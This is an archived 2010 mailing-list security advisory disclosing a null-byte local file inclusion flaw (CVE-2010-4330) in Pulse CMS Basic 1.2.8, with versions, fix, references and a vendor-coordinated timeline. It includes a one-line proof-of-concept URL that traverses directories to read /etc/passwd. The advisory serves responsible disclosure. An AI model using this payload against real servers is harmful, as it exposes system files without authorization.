lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 5 Dec 2010 15:41:34 -0500
From: Mark Stanislav <mark.stanislav@...il.com>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: 'Pulse CMS Basic' Local File Inclusion
	Vulnerability (CVE-2010-4330)

'Pulse CMS Basic' Local File Inclusion Vulnerability (CVE-2010-4330)
Mark Stanislav - mark.stanislav@...il.com


I. DESCRIPTION
---------------------------------------
A vulnerability exists in the 'includes/controller.php' script that allows for arbitrary local file inclusion due to a null-byte attack.

 
II. TESTED VERSION
---------------------------------------
Version 1.2.8


III. AFFECTED VERSIONS
---------------------------------------
< 1.2.9


IV. PoC EXPLOIT
---------------------------------------
http://www.example.com/index.php?p=/../../../../../../../../../../../../../../etc/passwd%00


V. NOTES 
---------------------------------------
* magic_quotes_gpc must be disabled for null-byte attacks to work
* This issue did not affect Pulse CMS Pro according to the vendor


VI. SOLUTION
---------------------------------------
Upgrade all previously installed versions to 1.2.9


VII. REFERENCES
---------------------------------------
http://pulsecms.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4330
http://www.uncompiled.com/2010/12/pulse-cms-basic-local-file-inclusion-vulnerability-cve-2010-4330/


VIII. TIMELINE
---------------------------------------
11/24/2010: Initial vendor disclosure
11/25/2010: Vendor response that they had fixed the issue & updated the existing version (1.2.8)
11/25/2010: Replied to vendor inquiring if a new point release would be made and affected versions
11/26/2010: Vendor response noting a version increment was coming & vulnerable versions confirmation
11/26/2010: Pulse CMS Basic 1.2.9 released
12/05/2010: Public disclosure
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ